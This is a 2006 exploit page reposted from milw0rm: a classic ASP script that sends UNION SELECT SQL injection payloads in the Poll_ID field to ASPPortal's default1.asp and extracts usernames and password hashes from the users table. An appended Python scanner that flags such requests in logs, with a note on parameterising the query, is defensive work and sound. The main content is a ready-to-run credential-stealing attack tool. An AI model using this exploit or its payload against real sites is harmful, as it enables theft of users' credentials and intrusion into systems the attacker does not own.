ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit
Source: http://www.milw0rm.com/ Author: ajann Published: 2006-11-13

<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>

<%

'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp

'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr: Decrypt the retrieved password with the Perl script.
'[Using : Tr: With the Turkish-language version of the script you cannot get the information with this exploit; you can pull it manually.
'[Using : Tr: I don't think anyone is low enough to do that.
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke

%>

<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>

<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}

function functionControl2(){
if(document.form1.field1.value==""){

alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");

}
}

function writetext() {

if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'

}
}
function write(){
setTimeout("writetext()",1000);
}

</script>


</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">

<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>

</table>

<div id=htmlAlani></div>

<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>

<%

If islem = "get" Then

string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")


targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)

If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")

Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")

Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")

Else
%>

<%

target1 = targettext+string1
target2 = targettext+string2

Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext
End With
SET objtake = Nothing
End Function

Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
.Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext
End With
SET objtake1 = Nothing
End Function

get_username = take(target1)
get_password = take1(target2)

getdata=InStr(get_username,"Poll Question:</b> " )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)

%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">            
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">           
<b><font size="2" face="Arial"> User Password:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>

</table>

<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>

</center>

<script language="JavaScript">
write()
functionControl1()
</script>

</body>
</html>

<%
End If
End If
End If
End If
Set objtake = Nothing
%>
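A defensive check for the request shown in the listing above, as an added example that is not part of the original exploit or of ASPPortal: it flags POSTs to default1.asp whose Poll_ID or Voteit field is not a plain integer. It assumes a proxy or WAF log that records POST bodies as (client, method, URL, body) tuples; the function names and the sample records are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Form fields the poll vote is expected to send as small non-negative integers.
# Field names come from the request body in the listing above.
NUMERIC_FIELDS = {"poll_id", "voteit"}
INTEGER = re.compile(r"[0-9]{1,9}")

def suspicious_fields(body):
    """Return {field: decoded value} for numeric fields that are not plain integers."""
    bad = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        # Classic ASP's Request.Form is case-insensitive, so match names that way.
        if name.lower() in NUMERIC_FIELDS:
            for value in values:
                if not INTEGER.fullmatch(value):
                    bad[name] = value
    return bad

def scan(records, page="default1.asp"):
    """Return (client, findings) for POSTs to `page` carrying non-integer numeric fields."""
    hits = []
    for client, method, url, body in records:
        path = urlsplit(url).path.lower()
        if method.upper() == "POST" and path.endswith("/" + page):
            findings = suspicious_fields(body)
            if findings:
                hits.append((client, findings))
    return hits

# Constructed sample records; client addresses are from documentation ranges.
SAMPLE = [
    ("192.0.2.10", "POST", "/portal/default1.asp", "Voteit=1&Poll_ID=7"),
    ("198.51.100.23", "POST", "/portal/default1.asp",
     "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0"
     "%20from%20users%20where%20user_id%20like%201"),
    ("192.0.2.11", "POST", "/portal/Default1.asp", "voteit=1&poll_id=3"),
    ("203.0.113.5", "GET", "/portal/default1.asp", ""),
]

if __name__ == "__main__":
    for client, findings in scan(SAMPLE):
        print(client, findings)
```

The durable fix belongs in the application itself: convert Poll_ID to an integer, or bind it as a query parameter, before it reaches the SQL statement.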



 